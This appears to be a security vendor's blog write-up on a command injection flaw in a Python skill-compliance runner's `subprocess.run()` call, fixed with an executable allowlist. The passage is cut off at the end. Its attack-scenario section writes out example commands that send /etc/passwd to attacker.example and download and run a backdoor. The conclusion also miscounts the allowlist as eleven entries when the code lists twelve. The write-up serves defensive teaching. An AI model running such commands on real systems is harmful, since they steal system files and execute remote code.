Back to Blog
critical SEVERITY9 min read

How command injection happens in Python subprocess and how to fix it

A command injection vulnerability in `skills/skill-comply/scripts/runner.py` allowed attackers who could influence skill definition files to execute arbitrary binaries on the host system via `subprocess.run()`. The fix introduces an explicit allowlist of permitted executables (`ALLOWED_SETUP_EXECUTABLES`) that gates every command before it reaches the subprocess call at line 110. This closes a significant attack surface in the skill-comply pipeline without breaking legitimate setup workflows.

O
By Orbis AppSec
Published June 18, 2026Reviewed June 18, 2026

Answer Summary

This is a command injection vulnerability (CWE-78) in Python's `subprocess.run()` call inside `skills/skill-comply/scripts/runner.py`. Because the `parts` array fed to `subprocess.run()` was derived directly from user-controlled skill definition files without validation, an attacker could craft a malicious skill definition to execute any binary available on the system. The fix adds a frozen-set allowlist (`ALLOWED_SETUP_EXECUTABLES`) that rejects any executable not explicitly approved — if the first token of a parsed command isn't in the allowlist, the command is silently skipped before reaching `subprocess.run()`.

Vulnerability at a Glance

cweCWE-78
fixAdded `ALLOWED_SETUP_EXECUTABLES` frozenset; commands whose first token is not in the allowlist are skipped before reaching `subprocess.run()`
riskArbitrary binary execution within the sandbox directory context, potentially leading to data exfiltration or host compromise
languagePython
root cause`subprocess.run(parts, ...)` executed commands derived from parsed skill definitions without validating the executable name against a known-safe list
vulnerabilityCommand Injection via unvalidated subprocess arguments

How Command Injection Happens in Python subprocess and How to Fix It

Summary

A command injection vulnerability in skills/skill-comply/scripts/runner.py allowed attackers who could influence skill definition files to execute arbitrary binaries on the host system via subprocess.run(). The fix introduces an explicit allowlist of permitted executables (ALLOWED_SETUP_EXECUTABLES) that gates every command before it reaches the subprocess call at line 110. This closes a significant attack surface in the skill-comply pipeline without breaking legitimate setup workflows.


Quick answer: This is a command injection vulnerability (CWE-78) in Python's subprocess.run() call inside skills/skill-comply/scripts/runner.py. Because the parts array fed to subprocess.run() was derived directly from user-controlled skill definitions without validation, an attacker could craft a malicious skill definition to execute any binary available on the system. The fix adds a frozen-set allowlist (ALLOWED_SETUP_EXECUTABLES) that rejects any executable not explicitly approved — if the first token of a parsed command isn't in the allowlist, the command is silently skipped before reaching subprocess.run().


Introduction

The _setup_sandbox() function in skills/skill-comply/scripts/runner.py is responsible for preparing an isolated working directory before a skill compliance scenario runs. It reads setup commands from scenario definitions and executes them to provision the sandbox — installing dependencies, creating files, cloning repositories. This is exactly the kind of automation you'd expect in a CI-adjacent tool.

But there was a flaw: every command parsed from the scenario definition was passed directly to subprocess.run() with no check on which executable was being invoked. An attacker who could influence a skill definition file could slip in a command like curl http://attacker.example/exfil?data=$(cat /etc/passwd) or simply execute any binary present on the host. The array form of subprocess.run() was correctly used — avoiding shell metacharacter interpretation — but that protection only goes so far when the executable name itself is attacker-controlled.


The Vulnerability Explained

The Vulnerable Code

Here is the relevant section of _setup_sandbox() before the fix, centered on line 110:

def _setup_sandbox(sandbox_dir: Path, scenario: Scenario) -> None:
    for cmd in scenario.setup_commands:
        parts = cmd.split()
        if not parts or parts[0] in SHELL_BUILTINS:
            # Shell builtins (cd/pushd/popd) cannot run as subprocess; skip.
            continue
        try:
            subprocess.run(parts, cwd=sandbox_dir, capture_output=True)  # line 110
        except FileNotFoundError:
            ...

The logic correctly skips shell builtins like cd, pushd, and popd — those can't be invoked as subprocesses anyway. But after that single guard, any executable name that appears as the first token of a setup command is handed to the OS for execution.

What parts Actually Is

parts is produced by splitting a raw string from scenario.setup_commands — a list that comes from parsed skill definition files. If those files are authored or modified by a user (or an attacker with write access to the skill definitions), they control the content of parts[0].

Even without shell=True, subprocess.run(["curl", "http://attacker.example/..."]) is perfectly valid Python and will happily invoke curl if it exists on the system. The sandbox directory (cwd=sandbox_dir) provides filesystem isolation, but it does not restrict which binaries can be executed.

A Concrete Attack Scenario

Imagine a CI pipeline that pulls skill definitions from a repository and runs the skill-comply checker. An attacker with write access to that repository (or who can submit a PR that gets merged) adds the following to a scenario's setup_commands:

setup_commands:
  - "curl http://attacker.example/exfil?d=$(cat /etc/passwd | base64)"
  - "wget -O /tmp/backdoor http://attacker.example/payload && chmod +x /tmp/backdoor && /tmp/backdoor"

When _setup_sandbox() processes this scenario, parts becomes ["curl", "http://attacker.example/exfil?d=..."] — which passes the shell-builtin check — and subprocess.run() executes it. The sandbox directory context doesn't help here; the command runs with the full privileges of the process, and curl or wget happily communicates with the attacker's server.

Why Array Form Isn't Enough

A common misconception is that using the array form of subprocess.run() (rather than a shell string like subprocess.run("curl ...", shell=True)) fully prevents command injection. It does prevent shell metacharacter injection — semicolons, pipes, backticks, and the like won't be interpreted. But it does nothing to restrict which program gets executed. The executable name is just another string, and if it comes from untrusted input, the array form provides no protection at all.


The Fix

The Allowlist Approach

The fix adds a frozenset of explicitly approved executables at module level:

ALLOWED_SETUP_EXECUTABLES = frozenset({
    "git", "npm", "pip", "pip3",
    "touch", "mkdir", "cp", "mv", "echo",
    "chmod", "unzip", "tar",
})

And then adds a single guard in _setup_sandbox() immediately after the shell-builtin check:

if parts[0] not in ALLOWED_SETUP_EXECUTABLES:
    # Restrict to known-safe executables to prevent arbitrary code execution.
    continue

Before vs. After

Before (vulnerable):

if not parts or parts[0] in SHELL_BUILTINS:
    continue
try:
    subprocess.run(parts, cwd=sandbox_dir, capture_output=True)
except FileNotFoundError:
    ...

After (fixed):

if not parts or parts[0] in SHELL_BUILTINS:
    continue
if parts[0] not in ALLOWED_SETUP_EXECUTABLES:
    # Restrict to known-safe executables to prevent arbitrary code execution.
    continue
try:
    subprocess.run(parts, cwd=sandbox_dir, capture_output=True)
except FileNotFoundError:
    ...

Why This Works

The allowlist is a frozenset — immutable at runtime, with O(1) lookup. Every command parsed from a scenario definition must now have its executable name appear in ALLOWED_SETUP_EXECUTABLES before it reaches subprocess.run(). The approved set covers the legitimate use cases for sandbox setup: cloning repositories (git), installing dependencies (npm, pip, pip3), manipulating files (touch, mkdir, cp, mv, chmod), and unpacking archives (unzip, tar).

Anything else — curl, wget, python, /bin/sh, a full path like /usr/local/bin/malware — is silently skipped. The continue statement means no error is raised; the sandbox setup just moves on to the next command. This is a deliberate design choice: failing loudly might allow an attacker to probe which executables are permitted by observing error output.

The Regression Test

The PR also adds tests/test_invariant_runner.py, which directly imports and calls _setup_sandbox() with crafted malicious scenario inputs. The test verifies that no marker files are created outside the sandbox and that sensitive file content doesn't leak into output — a concrete, repeatable invariant that guards against future regressions.


Prevention & Best Practices

1. Always Validate Executable Names Before subprocess.run()

Whenever subprocess.run() (or subprocess.Popen(), os.execv(), etc.) receives a command derived from external input, validate parts[0] against an explicit allowlist of known-safe executables. Do this before any other processing.

2. Use frozenset for Allowlists

A frozenset is the right data structure here: it's immutable (can't be accidentally modified at runtime), has O(1) membership testing, and makes the intent explicit. Avoid using a plain list for allowlists — the O(n) lookup is a minor concern, but the mutability is a real one.

3. Never Conflate Array Form with Safety

Using subprocess.run(parts, shell=False) prevents shell injection but does not prevent arbitrary executable invocation. Both protections are necessary when input is untrusted.

4. Apply Principle of Least Privilege to Subprocess Calls

Ask: what is the minimum set of executables this code legitimately needs to invoke? Encode that set explicitly. If you find yourself wanting to add python or bash to the allowlist, that's a signal to reconsider the design.

5. Run Static Analysis

  • Bandit (bandit -r .) flags subprocess calls with potentially untrusted input under rule B603/B604.
  • Semgrep has rules for subprocess injection patterns at semgrep.dev/r?q=subprocess.
  • This vulnerability was caught by the multi_agent_ai scanner rule V-001 — demonstrating that AI-assisted scanning can catch patterns that traditional regex-based tools might miss.

6. Reference: OWASP & CWE


Key Takeaways

  • Array form of subprocess.run() is not sufficient protection when parts[0] — the executable name — is derived from user-controlled input. An allowlist of permitted executables is also required.
  • ALLOWED_SETUP_EXECUTABLES in runner.py defines the security boundary for sandbox setup commands. Any future addition to this set should be reviewed as a security-relevant change.
  • Skill definition files are a trust boundary. Any code that parses and executes content from skill definitions must treat that content as potentially adversarial, even in internal tooling.
  • frozenset is the right tool for runtime allowlists in Python — immutable, fast, and semantically clear about intent.
  • Regression tests should test security invariants, not just functionality. The new test_invariant_runner.py directly tests the property "adversarial inputs must not result in arbitrary command execution" — a pattern worth adopting broadly.

How Orbis AppSec Detected This

  • Source: Skill definition files (scenario.setup_commands) parsed from the repository filesystem or external input, with no sanitization of executable names.
  • Sink: subprocess.run(parts, cwd=sandbox_dir, capture_output=True) at skills/skill-comply/scripts/runner.py:110, where parts[0] is the attacker-controlled executable name.
  • Missing control: No allowlist or denylist validation of parts[0] before the subprocess call. The only existing guard checked for shell builtins (which can't be invoked as subprocesses anyway), leaving all other executables unrestricted.
  • CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
  • Fix: Added ALLOWED_SETUP_EXECUTABLES frozenset and a pre-execution check that skips any command whose executable is not in the approved set.

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.


Conclusion

The vulnerability in runner.py is a clear illustration of why input validation must happen at every trust boundary — not just at HTTP endpoints or user-facing APIs, but also in internal automation scripts that process configuration files and skill definitions. The fix is elegantly simple: a frozenset of eleven approved executables and three lines of guard code. But the lesson is broader.

When you write code that calls subprocess.run(), ask yourself: where does parts[0] come from? If the answer is "parsed from a file" or "derived from user input," you need an allowlist. Array form is not enough. Sandbox directories are not enough. The only reliable protection is an explicit, minimal set of executables that your code is permitted to invoke — everything else should be rejected before it reaches the OS.

Security in automation tooling is easy to overlook precisely because it feels like internal infrastructure. But as this case shows, the skill-comply pipeline processes content that could be influenced by contributors, and that makes it an attack surface worth defending.


References

Frequently Asked Questions

What is command injection in Python subprocess?

Command injection in Python subprocess occurs when attacker-controlled data is used to construct the command or arguments passed to `subprocess.run()` (or similar calls) without proper validation, allowing unintended programs or shell commands to be executed.

How do you prevent command injection in Python subprocess?

Use an explicit allowlist of permitted executables and validate the first element of any command array before passing it to `subprocess.run()`. Never use `shell=True` with untrusted input, and prefer array-form invocation over string-form to avoid shell metacharacter interpretation.

What CWE is command injection?

Command injection is classified as CWE-78: Improper Neutralization of Special Elements used in an OS Command.

Is using the array form of subprocess.run() enough to prevent command injection?

No. Array form prevents shell metacharacter interpretation, but it does not prevent an attacker from specifying arbitrary executable names as the first element. An allowlist of permitted executables is also required.

Can static analysis detect command injection in Python subprocess?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can flag patterns where `subprocess.run()` receives data derived from external input without validation. This specific vulnerability was detected by the `multi_agent_ai` scanner rule `V-001`.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #2149

Related Articles

critical

How command injection happens in Python subprocess and how to fix it

A critical command injection vulnerability was discovered in a CGI script that processed HTTP requests using `subprocess.check_output()` with `shell=True`. Attackers could inject arbitrary shell commands through URL parameters using metacharacters like semicolons, pipes, or backticks. The fix converts the command from a string to a list and sets `shell=False`, preventing shell interpretation of user input.

critical

How buffer overflow in URL parsing happens in C++ HTTP client and how to fix it

A critical buffer overflow vulnerability in the HTTP client's URL parsing function allowed attackers to overflow a stack-allocated host buffer through specially crafted URLs with excessively long hostnames. The vulnerability enabled arbitrary code execution by overwriting the return address. The fix adds proper bounds validation before the memcpy() operation to ensure the hostname length never exceeds the destination buffer size.

critical

How integer overflow in _wopendir() happens in C Windows dirent and how to fix it

A critical integer overflow vulnerability in `include/compat/dirent_msvc.h` allowed an attacker-controlled directory path length to wrap the `sizeof(wchar_t) * n + 16` allocation calculation, resulting in a dangerously undersized heap buffer. Subsequent writes to that buffer caused a heap overflow, enabling potential memory corruption or code execution on Windows systems. The fix adds a pre-allocation bounds check and proper errno signaling to safely reject overflow-inducing inputs.

critical

How buffer overflow happens in C xxd utility and how to fix it

A critical buffer overflow vulnerability was discovered in the xxd utility's `xxdline()` function where `strcpy()` was used without bounds checking on file input. An attacker could craft a malicious hex dump file with oversized lines to trigger memory corruption. The fix replaces the unsafe `strcpy()` with `snprintf()` to enforce buffer size limits.

critical

How buffer overflow in memcpy() happens in C/C++ embedded firmware and how to fix it

A critical buffer overflow vulnerability was discovered in the ESP32-based micro-journal firmware where `memcpy()` calls used `strlen()` without bounds checking, allowing oversized USB descriptor strings to corrupt adjacent memory. The fix replaces unbounded `strlen()` with `strnlen()` calls that enforce the destination buffer sizes (8, 16, and 4 bytes respectively), preventing heap/stack corruption from malicious USB devices.

critical

How out-of-bounds reads happen in C gettext .mo file parsers and how to fix it

A missing bounds check in the gettext `.mo` file parser inside `compose/asc-utils-l10n.c` allowed a malformed or truncated file to trigger out-of-bounds reads from heap memory. The vulnerability affected two distinct read sites — a `memcpy` of the full `AscLocaleGettextHeader` struct at line 131 and a 4-byte offset read at line 224 — neither of which validated that the source buffer was large enough. The fix adds explicit size checks before both reads, rejecting invalid files with a descriptive